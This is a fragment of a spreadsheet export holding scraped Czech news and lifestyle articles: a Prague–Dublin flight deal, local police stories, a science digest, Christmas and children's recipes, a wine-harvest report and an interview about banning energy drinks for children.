Barbora Zykmundová Autor person Barbora Zykmundová</t>
  </si>
  <si>
    <t>1880</t>
  </si>
  <si>
    <t>20241201_154_3476264463_cec5f3ba0bb864f6f162.html</t>
  </si>
  <si>
    <t>cec5f3ba0bb864f6f162</t>
  </si>
  <si>
    <t>Přímé lety z Prahy do Dublinu na křídlech Aer Lingus od 2 508 Kč</t>
  </si>
  <si>
    <t>Přímé lety z Prahy do Dublinu na křídlech Aer Lingus od 2 508 Kč Přímé lety z Prahy do Dublinu na křídlech Aer Lingus od 2 508 Kč O této nabídce S pěknou nabídkou letenek do Irska přichází aerolinka Aer Lingus , která svými cenami konkuruje nízkonákladovému Ryanairu . Na jejích křídlech si zaletíš na smaragdový ostrov, na lince z Prahy do Dublinu , od 2 508 Kč, kdy máš v ceně tarifu „Saver“ i odbavený bágl do 10 kg a osobní věc. Akce v rámci Black Friday proma se vztahuje na lety od ledna do dubna 2025, tak si ulov třeba prodloužený víkend od 24. do 27. ledna. Jak jsme již zmínili, nejlevnější tarif „Saver“ zahrnuje přepravu odbaveného báglu do 10 kg a osobní věci o rozměrech do 33 × 25 × 20 cm. Pokud si chceš s sebou vzít i odbavený bágl do 20 kg, přikoupíš si ho za 2 180 Kč (v obou směrech). Rezervuj: přímo přes náš vyhledávač Zavazadla: odbavený bágl o rozměrech do 10 kg + osobní věc Dostupnost: leden – duben 2025 Termíny: 10. 1. – 13. 1. &amp;gt;&amp;gt; REZERVUJ ZDE 12. 1. – 19. 1. &amp;gt;&amp;gt; REZERVUJ ZDE 17. 1. – 20. 1. &amp;gt;&amp;gt; REZERVUJ ZDE 19. 1. – 26. 1. &amp;gt;&amp;gt; REZERVUJ ZDE 24. 1. – 27. 1. &amp;gt;&amp;gt; REZERVUJ ZDE 27. 1. – 3. 2. &amp;gt;&amp;gt; REZERVUJ ZDE 31. 1. – 3. 2. &amp;gt;&amp;gt; REZERVUJ ZDE 9. 2. – 12. 2. &amp;gt;&amp;gt; REZERVUJ ZDE 28. 2. – 5. 3. &amp;gt;&amp;gt; REZERVUJ ZDE 6. 3. – 10. 3. &amp;gt;&amp;gt; REZERVUJ ZDE 7. 3. – 12. 3. &amp;gt;&amp;gt; REZERVUJ ZDE 21. 3. – 24. 3. &amp;gt;&amp;gt; REZERVUJ ZDE a další… TIP: Míříš-li na odletové letiště vlastním autem, určitě ti přijde vhod podrobný průvodce parkováním na Letišti Praha . Odskoč si do Irska Nenech se odlákat churavým počasím, vždyť krásy Dublinu nejlépe vyniknou právě zalité ranní mlhou a třpytivé po nočním dešti. Toulej se uličkami plnými malebných domků a barevných dveří, žasni nad Dublinským hradem – hrdým symbolem města. Procházky okolím vždy vedou zelení a ty divoké kopce a útesy leží jen co by kamenem dohodil. Usměvaví a přátelští Irové tě vřele přivítají v jejich nádherné zemi, kde hraje strhující hudba, opíjí černé pivo a jemná whiskey. Ubytování Při hledání střechy nad hlavou kdekoliv ve světě se můžeš jednoduše spolehnout na Booking (rezervací přes tento odkaz podpoříš náš web, ale cena pro tebe zůstane stejná) či AirBnB. Pokud tvoje cesta není v nejbližších týdnech, raději ti doporučíme bookovat ubytko s možností bezplatného storna. Mrkni se na nejširší nabídku ubytování v Dublinu . Hodit se ti bude také bohatá nabídka ubytování v celém Irsku . Autopůjčovna Projeď celé Irsko křížem krážem, k čemuž ti přijde vhod půjčená kára. Tu si snadno zarezervuješ přes naši autopůjčovnu, kde tě vyjde od 388 Kč na den. Náhled letenky z Prahy do Dublinu za 2 508 Kč Bude se hodit Autor: Emca</t>
  </si>
  <si>
    <t>5860</t>
  </si>
  <si>
    <t>20241201_155_3476289407_203510f9bae9064b5873.html</t>
  </si>
  <si>
    <t>203510f9bae9064b5873</t>
  </si>
  <si>
    <t>Střet auta s chodkyní ve Žďáru. Žena upadla na zem a zranila se</t>
  </si>
  <si>
    <t>Střet auta s chodkyní ve Žďáru. Žena upadla na zem a zranila se Devětačtyřicetiletý řidič peugeotu na křižovatce s Vodárenskou ulicí odbočoval. Přehlédl chodkyni, která v tu dobu silnici přecházela, a došlo ke střetu. Krimi „Pětapadesátiletá žena po nárazu upadla na silnici. Při dopravní nehodě chodkyně utrpěla zranění," řekla policejní mluvčí Jana Kroutilová . U řidiče i chodkyně policisté provedenou dechovou zkouškou požití alkoholu vyloučili. Autor: Zuzana Musilová Autor Zuzana Musilová</t>
  </si>
  <si>
    <t>20241201_156_3477187601_f464bc51701ba66380b5.html</t>
  </si>
  <si>
    <t>f464bc51701ba66380b5</t>
  </si>
  <si>
    <t>Nanoruce &amp;amp; Prafocaccia – Týden ve vědě 25. listopadu až 1. prosince 2024</t>
  </si>
  <si>
    <t>Nanoruce &amp;amp; Prafocaccia – Týden ve vědě 25. listopadu až 1. prosince 2024 01. prosince 2024 První adventní neděle přináší krom klemry i šestici aktualit z vědeckých luhů a hájů! Dnes se zahřejeme třeba robotem z DNA, flusanci užitečnými při diagnostice anebo taky možným původem vody na Zemi! 48. týden ve vědě roku 2024! Zdroj: CC BY, Apple , vlastní Vytvořen nanorobot z DNA schopný chytat viry do nanorukou. Nanorobot byl „upleten“ z jediného vlákna DNA, přičemž na konečcích jeho „prstů“ jsou struktury schopné zachytit konkrétní virové částice. Schopnost zatím prokázal na virech, které způsobují covid. Focaccia se pekla již před 9 000 lety. Experimentální archeologie i chemická analýza potvrdily, že keramické nádoby z počátku neolitu sloužily jak k drcení obilovin, tak i pečení těsta z nich za vysokých teplot – a koření analogických těch z dnešního italského chleba. Flusance korovce jedovatého pomůžou diagnostikovat rakovinu. Pouštní ještěr korovec jedovatý má ve slinách jed, obsahující mnoho látek. Jednu z nich se podařilo využít pro efektivnější diagnostiku rakoviny beta buněk slinivky břišní. Kvantová elektrodynamika odhalila tvar fotonu. Nový model nejenže vymezuje interakci mezi zářením a hmotou na kvantové úrovni, ale také poprvé překvapivě umožňuje definovat tvar jednotlivých fotonů. To se hodí pro další vývoj senzorů, fotovoltaických článků či kvantových počítačů. Česká studie naznačuje, že hvězdný vítr přinesl na Zemi vodu. Práce naznačuje, že atomy vodíku bombardující povrch meteoritů ve hvězdném větru spustily vznik molekul vody. Mléčná dráha je výjimka, většina podobných galaxií má odlišné satelity. Desetiletá studie 101 galaxií podobných Mléčné dráze, kterou provedl průzkum SAGA, ukazuje, že Mléčná dráha je odlehlá v počtu satelitních galaxií a vzorcích tvorby hvězd. Bottom Studie popsala dávný výzkum hi-tech vynálezu: kola. Kamenné oblázky s dírou uprostřed pro „nápravu“ mohly před 12 000 lety v oblasti Galilejského jezera sloužit pro tvorbu korálků – jde také o příklad toho, jak se postupně piloval vynález jménem kolo! Čtenáři dávají přednost poezii generované AI před klasickými básněmi. Lidé nejenže často nedokážou rozlišit mezi lidskou a AI poezií, ale dokonce tu druhou mnohdy upřednostňují. Projekt RocketRoll chce základ pro jaderný kosmický remorker do roku 2035. Cílem jedenáctileté iniciativy je vyvinout systém jaderného elektrického pohonu, který slibuje efektivnější alternativu ke konvenčním raketovým palivům. Megasídliště Tripolské kultury redukovala šíření nákaz. Nedávno jsme tu měli srovnání prvního praměsta Çatal Hüyük, které nemělo ulice, s megasídlištěmi, které je mělo. Nyní studie odhalila, že tyto osady Tripolské kultury byly skutečně organizovány tak, že redukovala šíření infekcí. Nejstarší nalezená střelná zbraň v USA je dělo z 16. století. V Arizoně bylo nalezeno bronzové dělo z doby Coronadovy výpravou z let 1539-1542. Jde o nejstarší artefakt související s dnešním nejoblíbenějším americkým hobby! Náklady na zvrácení změny klimatu se po překročení kritických bodů zčtyřnásobí. Tlumit uhlíkové emise se nám moc nedaří, ale můžeme se uklidňovat tím, že skrze zachycení uhlíku či geoinženýring můžeme vše opravit i v budoucnu. Teoreticky ano, podle nové práce nás to ale vyjde podstatně dráž. Bonusy Umělá inteligence ošálila systém detekce lidí reCAPTCHAv2. Ochrana před boty bude o něco složitější. Studie totiž demonstrovala, že ochranu před boty od Google lze prolomit častěji nežli doposud s využitím AI rozeznávající obraz. Existují však i pokročilejší systémy ochrany, které takto prolomeny (zatím?) nebyly. Do světa moderní keramiky se Soňou Hříbalovou. Po návštěvě v laboratořích Soni Hříbalové z VŠCHT jsme sedli i na kus řeči o nejen o vědeckém studiu keramiky, ale i její cestě do světa vědy. [red] Vědátor vznikl v dílně spolku studentů a popularizátorů vědy UP Crowd. Krom různých autorů projekt jako šéfredaktor vede Ladislav Loukota – jeho kontaktní mail je [email protected] tvv2024_48 Mohlo by vás dále zajímat: Pulci &amp;amp; Pragalaxie – Týden ve vědě 18. až 24.… 24. listopadu 2024 Za měsíc jsou tu Vánoce – potrénujte na toto veselení s dnešní nadílkou objevů vědy! Neseme obří galaxie, „nesmrtelné“ medúzy… Ruiny &amp;amp; Společnosti – Týden ve vědě 11. až 17.… 17. listopadu 2024 Staronová města, evoluce sociálních druhů nebo třeba spermie unavené vesmírem – nový týden ve vědě projasní vaši temnou neděli! 46.… Kosmosoláry &amp;amp; Diabetes – Týden ve vědě 4. až 10.… 10. listopadu 2024 Zahřejte se v této chladné neděli množinou hřejivých objevů! Čekají vás kosmická elektrárna, fotosyntetizující živočišné buňky nebo třeba přehlídka chyb… Miranda &amp;amp; Prasklep – Týden ve vědě 28. října až… 03. listopadu 2024 Sklepy, vodní měsíce nebo třeba predikce zemětřasů – nový týden ve vědě nabízí každému porci vědátorských objevů! 44. týden ve… Reklama Autor: loukota</t>
  </si>
  <si>
    <t>2600</t>
  </si>
  <si>
    <t>1430</t>
  </si>
  <si>
    <t>20241201_157_3476218760_e638a6c5171d2c488a96.html</t>
  </si>
  <si>
    <t>e638a6c5171d2c488a96</t>
  </si>
  <si>
    <t>Tipy pro přípravu dokonalých vosích hnízd</t>
  </si>
  <si>
    <t>Tipy pro přípravu dokonalých vosích hnízd. Autor: Shutterstock 1 Vánoční cukroví je nedílnou součástí vánočních svátků a každý má své oblíbené druhy, které nesmí chybět na svátečním stole. Jedním z nejoblíbenějších druhů cukroví v českých domácnostech jsou vosí hnízda. Tato sladká pochoutka nejenže skvěle vypadá, ale také láká svou neodolatelnou chutí a jemnou strukturou. Podíváme se na to, jak vytvořit dokonalá vosí hnízda, a přidáme několik zajímavostí o jejich historii a tipy na různé náplně. Historie vosích hnízd Vosí hnízda, známá také jako včelí úlky, mají v Česku dlouhou tradici. Jejich původ není zcela jasný, ale pravděpodobně se začaly připravovat ve střední Evropě v období, kdy cukroví začalo získávat na popularitě jako symbol prosperity a oslav. Období, kdy se začali více experimentovat s různými druhy sladkostí, vedlo k vytváření nových forem a chutí a vosí hnízda se stala jednou z těch, které přetrvaly do dneška. Recepty: Luxusní vosí hnízda Jak připravovat vosí hnízda K přípravě dokonalých vosích hnízd nepotřebujete výjimečné cukrářské dovednosti, ale určitě je potřeba dodržovat několik zásad. Nejprve je důležité důkladně zpracovat těsto. Většinou se používá směs z mletých ořechů, piškotů a másla. Chcete-li vyzkoušet vosí hnízda bez ořechů, můžete ořechy jednoduše vynechat či nahradit alternativními ingrediencemi, které zachovají strukturu a chuť těsta. Důležitým krokem při přípravě je formování těsta do typického tvaru úlku. Existují speciální formičky na vosí hnízda, které tento úkol výrazně zjednoduší. Těsto by mělo být pořádně vychlazené, aby se snadno tvarovalo a udrželo svůj tvar. Čím plnit vosí hnízda Tradiční vosí hnízda jsou plněna krémovou směsí, která dodává cukroví bohatou chuť. Klasickou volbou je máslový krém, který se dá připravit z různých druhů příchutí, jako je rum, káva nebo čokoláda. Krém by měl být hladký a dostatečně tuhý, aby udržel tvar po naplnění do formiček. Pro ty, kteří se chtějí vyvarovat alkoholu nebo hledají novou chuťovou dimenzi, může být skvělou volbou vanilkový nebo oříškový krém. Mladší generace často přidává do náplně různé moderní přísady, jako je bílá čokoláda nebo karamel. Vytvořit můžete i netradiční recept na vosí hnízda využitím citronového nebo pomerančového krému, který přinese svěží aroma. Recepty: Vosí hnízda recept Vosí hnízda bez ořechů Pro alergiky nebo ty, kteří nemají ořechy v lásce, jsou vosí hnízda bez ořechů ideální variantou. Pro tuto verzi se používají alternativní přísady jako strouhanka nebo rozdrcené piškoty, které fungují jako pojivo místo ořechů. Ačkoli se chuť může trochu lišit od tradičních vosích hnízd, výsledkem je stejně lahodná pochoutka. Při přípravě vosích hnízd platí, že čím kvalitnější budou ingredience, tím lepší bude výsledný produkt. Investujte do kvalitního másla, čerstvých vajec a kvalitní čokolády, pokud ji používáte. Při plnění vosích hnízd se snažte pracovat rychle a efektivně, aby krém nezačal měknout a vosí hnízda si udržela svůj tvar. Podávejte je na krásných talířích nebo dekoračních mísech, ať vynikne jejich struktura a tvar. Vosí hnízda jsou ideální nejen na vánoční stůl, ale také jako krásný dárek pro rodinu a přátele. Ať už využijete tradiční recept na vosí hnízda, nebo zvolíte variantu bez ořechů, věřím, že s našimi tipy připravíte cukroví, které okouzlí každého. Vosí hnízda jsou skvělým příkladem toho, jak tradice může jít ruku v ruce s inovací, a přinést tak radost každé rodině během vánočních svátků. Zdroj: názor autora Autor: Lea Novotná Autor person Lea Novotná</t>
  </si>
  <si>
    <t>17400</t>
  </si>
  <si>
    <t>21230</t>
  </si>
  <si>
    <t>20241201_158_3476223312_45bd70696a1bbeda37bd.html</t>
  </si>
  <si>
    <t>45bd70696a1bbeda37bd</t>
  </si>
  <si>
    <t>Zábavné a zdravé recepty na rodinné vaření s dětmi</t>
  </si>
  <si>
    <t>Zábavné a zdravé recepty na rodinné vaření s dětmi Veronika Kubátová · 1. 12. 2024 · 0 komentářů Vaření s dětmi představuje skvělý způsob, jak trávit čas se svou rodinou, a zároveň podpořit zdravé stravovací návyky. V tomto článku se podíváme na zajímavé recepty, které zabaví vaše děti a povzbudí jejich kreativitu v kuchyni. Kromě toho se dozvíte, jaké výhody přináší vaření s dětmi a proč byste měli tuto aktivitu zařadit do svého rodinného režimu. Obsah článku Příprava zdravých pomazánek pro malé labužníky Kreativní ovocné dezerty bez cukru Hlavní jídlo: Barevné těstoviny s pestem Příprava zdravých pomazánek pro malé labužníky Pomazánky jsou ideální na svačinu a najdou si své místo v každém rodinném menu. Umožňují dítěti experimentovat s chutěmi a texturami, přičemž výběr surovin může být zcela zdravý. Zde je jednoduchý recept na avokádovou pomazánku, kterou si děti snadno připraví samy. **Ingredience:** – 1 zralé avokádo – 1 lžíce citronové šťávy – Sůl a pepř podle chuti – Chléb nebo zeleninové tyčinky na servírování **Postup:** 1. Avokádo rozkrojte a vyjměte pecku. 2. Děti mohou pomocí lžíce avokádo vydlabat do mísy. 3. Přidejte citronovou šťávu, sůl a pepř. 4. Vše dobře rozmixujte vidličkou, dokud nevznikne hladká pomazánka. 5. Podávejte s chlebem nebo čerstvou zeleninou. Zajímavostí je, že avokádo je bohaté na zdravé tuky, které podporují vývoj mozku, což z něj dělá ideální potravinu pro děti. Kreativní ovocné dezerty bez cukru Dezerty jsou často považovány za nezdravé, ale když použijete přírodní ingredience, stanou se skvělou a zdravou volbou. Ukažte svým dětem, jak vytvořit ovocné toalety, které potěší nejen chutě, ale i oči. **Ingredience:** – 1 banán – 1 jablko – Hroznové víno – Pomeranč – Jogurt **Postup:** 1. Nejprve si připravte všechnu zeleninu a ovoce. 2. Banán rozkrojte na poloviny a jablko nakrájejte na plátky. 3. Z hroznového vína vytvořte „oči“ a z pomeranče „ústa“. 4. Poslužte si jogurt jako pomyslnou „půdu“. 5. Nechte děti vytvářet různé tvary a postavy podle vlastní fantazie. Tento dezert je nielen zábavný, ale také zdravý, protože obsahuje velké množství vitamínů a vlákniny, které děti potřebují ke zdravému růstu. Hlavní jídlo: Barevné těstoviny s pestem Těstoviny jsou univerzální a děti je mají většinou rády. Přidejte k nim tvořivost a obohaťte je o různorodé ingredience. Tento recept na barevné těstoviny s domácím pestem učiní z večeře nejen chutný zážitek, ale také umělecké dílo. **Ingredience:** – 250 g těstovin (můžete použít barevné varianty, např. špenátové) – 1 hrnek čerstvé bazalky – 2 stroužky česneku – 50 g parmazánu – 50 ml olivového oleje – Sůl a pepř podle chuti **Postup:** 1. Těstoviny uvařte podle pokynů na obalu. 2. Mezitím si připravte pesto: v mixéru smíchejte bazalku, česnek, parmazán a olivový olej, dokud nevznikne hladká pasta. 3. Po uvaření těstoviny sceďte a smíchejte je s pestem. 4. Děti mohou vzít do rukou různé ingredience a nastavit si vlastní porce, čímž podpoří svou kreativitu. Zajímavá skutečnost: Těstoviny jsou více než jen jednoduchou přílohou; mají dlouhou historii a jsou součástí mnoha kultur po celém světě. Vaření s dětmi je skvělou příležitostí pro společné trávení času a poznávání různých chutí a kultur. Pomocí jednoduchých a zábavných receptů můžete povzbudit jejich tvořivost a naučit je hodnotě zdravého stravování. Dejte si spolu pauzu od elektroniky a věnujte se radosti z domácí kuchyně, kde vznikají nejen skvělé pokrmy, ale také nezapomenutelné vzpomínky. Veronika Kubátová Autor: Veronika Kubátová Autor person Veronika Kubátová Rubrika transition_slide Recepty</t>
  </si>
  <si>
    <t>20241201_159_3476222963_ec90298543aa8624d1bb.html</t>
  </si>
  <si>
    <t>ec90298543aa8624d1bb</t>
  </si>
  <si>
    <t>Listopadový bizár i největší kuriozity. Halloween s pravou krví, naháč venčící psa a sprostý kazatel v akci</t>
  </si>
  <si>
    <t>Listopadový bizár i největší kuriozity. Halloween s pravou krví, naháč venčící psa a sprostý kazatel v akci Jaké největší bizarnosti a kuriozity se staly během listopadu v Plzeňském kraji? Bylo jich hodně a v přehledu Plzeňské Drbny si připomeneme ty nejzajímavější. A také ty, které samozřejmě nejvíc zaujaly i vás, naše čtenáře. Rekordní čtenost měl v listopadu text o polomrtvém a na kost promrzlém muži, kterého našli lidé ležet vedle lavičky. Velkou pozornost vyvolal i materiál o bezdomovci, jenž obsazuje v Plzni zastávky MHD, kde pak kempuje. Tomu jsme se věnovali hned dvakrát. Kuriózní byl ovšem i případ naháče, který v ulicích města venčil svého psa. Strašidelná byla žena, která během Helloweenu bloudila ulicemi Plzně se skutečnou ránou na hlavě, ze které se řinula krev. Kuriózní zásah má za sebou čtyřiadvacetiletý strážník, který cestou na noční zadržel zloděje. Kousek od náměstí Republiky kolem něj prosvištěl muž s nákupním košíkem plným kradeného zboží. Policista zasáhl bleskově. Muže zpacifikoval, sebral mu lup a odvedl zpět do prodejny, kde už čekali strážníkovi kolegové. Hlášení od občanů o neznámém muži, který s klackem v ruce rozkopává a uráží zpětná zrcátka u několika zaparkovaných aut, obdržela hlídka plzeňské městské policie. Strážník okamžitě přerušil svou činnost a vyrazil směrem k místu, kde se muž měl podle informací pohybovat. Šlo o sídliště Vinice. Stále častěji si teď bezdomovci budují své provizorní příbytky přímo v ulicích Plzně . Jeden z nich teď ale obsadil i zastávku MHD v Jateční ulici na Doubravce . Na zastávku si muž nastěhoval celou řadu krabic a tašek, nechyběl ani tradiční nákupní vozík odcizený v některém nákupním centru, který sloužil jako sušák na prádlo .Dlouhodobější kempování mu ale překazila hlídka městské policie. Mohlo to vypadat jako vydařený halloweenský kostým a návrat z pořádně rozjeté party. Ale v tomto případě byla krev skutečná! Pozornosti hlídky městské policie neunikla žena, která za bílého dne procházela ulicemi Plzně a po krku jí stékala krev z rány hlavě. Opravdu velmi nalehko vyrazil Plzeňan do ulic města, aby vyvenčil svého psa. Na nohou měl pouze žabky. K jeho smůle ale narazil na hlídkující strážníky, kteří se ho ihned zeptali, co to provádí. Prý šlo o prohranou sázku. Premium Když policisté řešili opilého řidiče za volantem osobního automobilu, sledoval smutně jejich jednání ze zadního sedadla dobrman. K překvapení policistů se ukázalo, že pes ani nepatří zastavenému řidiči. Hlídka proto musela přivolat do akce odchytovou službu městské policie. Opravdu nechutný výstup předvedla dvojice na Americké třídě v Plzni . Muž i jeho partnerka popíjeli alkohol , ačkoli to bylo v rozporu s městskou vyhláškou. Žena se navíc nestyděla a vymočila se přímo na chodník. Strážníci, kteří přijeli situaci vyřešit, to s nimi neměli vůbec jednoduché. Ochmelka se sotva udržel na nohou, křičel, nadával a všemožně se bránil. Kázání samozvaného Boha Lukáše S. na platformě YouTube utichlo zhruba na měsíc. Zveřejnil nové video, kde nadává na soudy i policii, která dle jeho slov hlídkovala kolem sídla Ohnivý drak v Plasích na severním Plzeňsku . Právě na datum 11. listopadu Lukáš S. prorokoval „apokalypsu“, při níž budou umírat i malé děti. Nakonec jen zveřejnili pozvánku na jejich nový placený kanál na Herohero. Vůdce náboženského hnutí policie obvinila z pěti trestných činů. V Plasích také došlo k domácímu porodu. Rodička zemřela, dítě je u pěstounů. Nekorunovaný král plzeňských zastávek MHD se rozhodně nehodlá vzdát své záliby. Osmašedesátiletý bezdomovec opakovaně obsazuje na různých místech města zastávky, kde pak kempuje obklopen svým kompletním majetkem. Bohužel ale zastávky MHD silně zněčišťuje. Do otřesného stavu se propila třicetiletá žena, kterou našel člen ostrahy na toaletách jednoho velkého nákupního centra uprostřed Plzně. Žena byla v naprosto žalostném stavu a nedokázala se ani udržet na nohou. Do akce vyjela na základě upozornění ostrahy hlídka městské policie. Šokující byly naměřené hodnoty množství alkoholu , který v sobě dotyčná měla. Do objektu vysokoškolských kolejí v Plzni na Lochotíně se snažil násilím proniknout neznámý muž. Když neuspěl, zvolil strategii, kdy jen ležel a hlasitě křičel. Po příjezdu přivolané hlídky městské policie začal muž s velmi podivným chováním stupňovat svoji agresivitu a napadl i jednoho strážníka. A to rozhodně neměl dělat. Otevřená dvířka a všude kolem roztahané oblečení. Taková je teď každodenní realita v Rokycanech , kde řádí zatím neznámý zloděj. Svou pozornost směřuje vyloženě na kontejnery na textil. Strážníci žádají o spolupráci i veřejnost. Pokud budete svědky podezřelého jednání, volejte na linku 156. Autor: Richard Beneš Autor person Richard Beneš</t>
  </si>
  <si>
    <t>33290</t>
  </si>
  <si>
    <t>26980</t>
  </si>
  <si>
    <t>20241201_16_3479285355_b872eb5d5375ed642950.html</t>
  </si>
  <si>
    <t>b872eb5d5375ed642950</t>
  </si>
  <si>
    <t>Podle odhadu světová produkce vína bude letos asi nejnižší od roku 1961</t>
  </si>
  <si>
    <t>Podle odhadu světová produkce vína bude letos asi nejnižší od roku 1961 Světová produkce vína se v letošním roce patrně opět sníží a bude nejslabší od roku 1961. Hlavní příčinou je špatné počasí. Uvedla to Mezinárodní organizace pro révu a víno (OIV). Podle jejího odhadu by se produkce měla pohybovat v rozmezí 227 milionů až 235 milionů hektolitrů, což bude zhruba o dvě procenta méně než loni, informuje agentura AFP . Vinohrady postihly jarní mrazy Odhad vychází z údajů o sklizni ve 29 zemích, které se na loňské produkci podílely 85 procenty. V roce 1961 produkce činila 220 milionů hektolitrů. Proti průměru za posledních deset let bude letošní produkce nižší zhruba o 13 procent. Český Svaz vinařů zatím přesné údaje o sklizni hroznů nemá, v současnosti sbírá informace od vinařů. "Zatím můžeme jen shrnout to, co jsme avizovali na konci vinobraní. Jarní mrazy nejvíce postihly vinohrady v Čechách , ty byly prakticky vyřazené, sklizeň byla letos přibližně o tři až čtyři týdny dřív," uvedl prezident Svazu vinařů Martin Chlad. Podle předběžných odhadů byl letos výnos za celé Česko podprůměrný. Podle OIV produkce v Česku letos klesne o 28 procent na 0,3 milionu hektolitrů. Ve srovnání s průměrem za posledních pět let bude nižší o 38 procent. "Klimatické problémy na obou polokoulích jsou opět hlavní příčinou sníženého objemu světové produkce," uvedla OIV. Stejně jako v roce 2023 mají na globální produkci výrazný vliv extrémní nebo atypické meteorologické jevy. Produkci vinic ovlivňují hlavně brzké mrazy, silné deště a dlouhotrvající sucho. Ve většině regionů produkce klesla.* Pro přidávání komentářů se musíte nejdříve přihlásit. The form was sent successfully. An error occured. Autor: Zuzana Fialová Autor person Zuzana Fialová Rubrika transition_slide Vinařství</t>
  </si>
  <si>
    <t>862</t>
  </si>
  <si>
    <t>506</t>
  </si>
  <si>
    <t>20241201_160_3476223225_0d293cc6fccf282370c5.html</t>
  </si>
  <si>
    <t>0d293cc6fccf282370c5</t>
  </si>
  <si>
    <t>Energy drinky jsou svinstvo, hájí zákaz Zajíčková. Poukazuje na obezitu i deprese u dětí</t>
  </si>
  <si>
    <t>Energy drinky jsou svinstvo, hájí zákaz Zajíčková. Poukazuje na obezitu i deprese u dětí Co si slibujete od zákazu energetických nápojů pro děti? Celý život pracuji ve školství a vím, jak energy drinky negativně ovlivňují mladší generaci. Od zákazu si slibuji, že do společnosti vyšleme signál, že energy drinky jsou svinstvo. Obsahují obrovské množství cukru, kofeinu, taurinu. Původně měly sloužit úzké skupině lidí – sportovcům, řidičům kamionů. Dnes si tyto nápoje běžně kupují malé děti už třeba v deseti letech. A rodiče to ani kolikrát nemusí vědět. Zákaz je také nástroj pro školy, které si budou moci dát do svých školních řádů, že třeba na kurzech, kam se s dětmi jezdí, se nebudou smět konzumovat kromě alkoholu ani energetické nápoje. MOHLO BY VÁS ZAJÍMAT: Přijetí eura? Politikům chybí odvaha, říká ministr Dvořák. Prozradil, jak téma štěpí vládu Můžete ze své zkušenosti konkrétně popsat, co energy drinky s dětmi dělají? Způsobují obezitu, kazí se zuby. A samozřejmě nejen to. Večery a noci děti dnes tráví na sociálních sítích, rodiče to netuší. Děti ráno přijdou do školy a usínají nám tam. Když jsme zjišťovali, proč to tak je, tak kvůli tomu, že nespí. Chodí spát třeba ve čtyři hodiny ráno. A protože dítě ve škole usíná, tak si ráno koupí energy drink, aby bylo schopné vůbec fungovat. Když se studentů ptám, jak spí, tak obrovské procento dětí spí méně než šest hodin. Zásadní jsou ty poruchy spánku. Máme obrovský nárůst dětí s úzkostmi, depresemi, sklony k sebepoškozování. Nemůžeme říct, že je to jednoznačně vinou energy drinků nebo sociálních sítí, je to kombinace víc věcí. Nebylo by ale přeci jen lepší jít cestou osvěty než regulací? Mluvit s dětmi o tom, jak je spánek důležitý, proč jsou energy drinky škodlivé. Musí to být kombinace všeho. Nejde spoléhat jen na osvětu. Věřím, že osvěta ve školách je, ale to je jen jedna část. Máte vliv vrstevníků, reklam, rodiny. Je potřeba osvěta a edukace všech, i dospělých. Ale v kombinaci s regulací. Jak se bude zákaz prodeje hlídat třeba v automatech na nápoje, nebo při nákupu v e-shopech s potravinami? Dítě také může říct staršímu kamarádovi, aby mu drink koupil. Tomu bohužel nezabráníte. Nikdy nepokryjete sto procent. Ale i to, že si děti nápoj nebudou moci koupit v obchodě a nebudou ho moct konzumovat na školních akcích a na veřejnosti, pomůže. Doufám, že se časem ukáže, že zákaz a fungoval a že se konzumace sníží. Problematické také je, že děti často energy nápoje kombinují s alkoholem nebo kratomem, a to je násobný negativní účinek. Výrobci tvrdí, že problémem je, že stavíte energetické nápoje do pozice návykové látky, a že škodlivost není vědecky podložená. Jak vnímáte tu kritiku? Jasně, že s tím nesouhlasí. Budou říkat, že dělají osvětu a necílí na děti, ale všichni víme, jak to je. A jestli jsou energetické nápoje návykové? Je v nich kofein. A ten je, stejně jako tein, návyková látka. Pokud ho konzumuje dospělý člověk, tak jeho organismus už má nějakou odolnost. Pokud ho konzumuje 12leté dítě, tak samozřejmě závislost na kofeinu i cukru může vzniknout. Problematické také je, že děti často energy nápoje kombinují s alkoholem nebo kratomem, a to je násobný negativní účinek. Nedopadne to rovnou tak, že vláda bude chtít nějakým způsobem regulaci pro všechny slazené nezdravé nápoje? V koalici se už debatovalo o zavedení spotřební daně na limonády. To prosazoval ministr zdravotnictví Vlastimil Válek (TOP 09). Jako pravicový politik nejsem úplně ztotožněná s tím, že máme řešit vše, co je nezdravé a škodlivé pro společnost. Vnímám svobodu a vlastní zodpovědnost každého jedince. Pokud se zdravý člověk rozhodne, že se bude ládovat cukrem a do toho kouřit, je to jeho osobní rozhodnutí. Ale chtěla bych, aby se podílel na nákladech, které jsou spojeny s důsledky jeho nezdravého životního stylu. To se teď neděje a jako ODS budeme prosazovat, aby nějaká participace lidí třeba i na zdravotním pojištění byla. Jinak to ale vnímám ve vztahu k dětem. Děti jsou zranitelnější skupinou, nemají tolik informací, jsou ve spotřebitelském řetězci slabším článkem. A pro zmiňovanou spotřební daň na slazené nápoje byste byla? V nějaké míře bych si to dokázala představit, způsobů je více – spotřební daň, DPH. Fakt je ten, že obezita mezi malými dětmi obrovsky stoupá. Dnes když se podíváte na třídu na základní škole, tak to není třída štíhlých sportovních dětí. To je třída otylých, nemotorných mladých lidí, kteří se bojí rozeběhnout. Těch důvodů je strašně moc a je to velmi komplikovaná debata. Jezdíme více auty, nechodíme pěšky, stravujeme se nezdravě, málo se pohybujeme, jsme hodně na sociálních sítích. Potom máme úzkosti, rozhodovací paralýzu, řešíme to prášky. Není jedna věc, která to změní. Měli bychom změnit vnímání sama sebe, svojí role ve společnosti. Ale to je nesmírně těžký úkol a žádná vláda nemá nástroje, aby to změnila. Hřibův nápad zrušit ministerstvo školství? Úplný úlet. Zásadní změny ve školství Nový šéf Pirátů Zdeněk Hřib nedávno přišel s nápadem, že by se mělo zrušit ministerstvo školství a agendu by přebraly kraje. Co si o tom myslíte? Je to úplný úlet. Buď se pan Hřib chtěl zviditelnit, anebo ukázal naprostou neznalost školského prostředí. Každý rozumný člověk vnímá, že ministerstvo školství je zastřešující organizace vzdělávání. Kdyby platilo, co chce pan Hřib , tak bychom tady měli 14 různých vzdělávacích systémů, které by byly neřízené, nekoordinované, každý kraj by měl jinou strukturu vzdělávání. Je to naprostý nesmysl. Voláte po zásadních reformách českého vzdělávacího systému, označujete ho za zastaralý. Selhala v tom vláda, potažmo ministerstvo školství? Proč za tři roky situaci nezlepšila? Ještě nejsme u konce. Chystají se poměrně zásadní změny ve školském zákoně. Ale je fakt, že změny, které prosazuji já, v něm obsaženy nejsou. Potřebují delší přípravu. Navrhuji zkrácení základní školní docházky na osm let a prodloužení povinné školní docházky o dva roky, ruku v ruce zároveň. K tomu je ale potřeba ještě odborná široká diskuze. Nicméně to, že je systém školství zastaralý, říkají všichni už roky – včetně vás. Proč 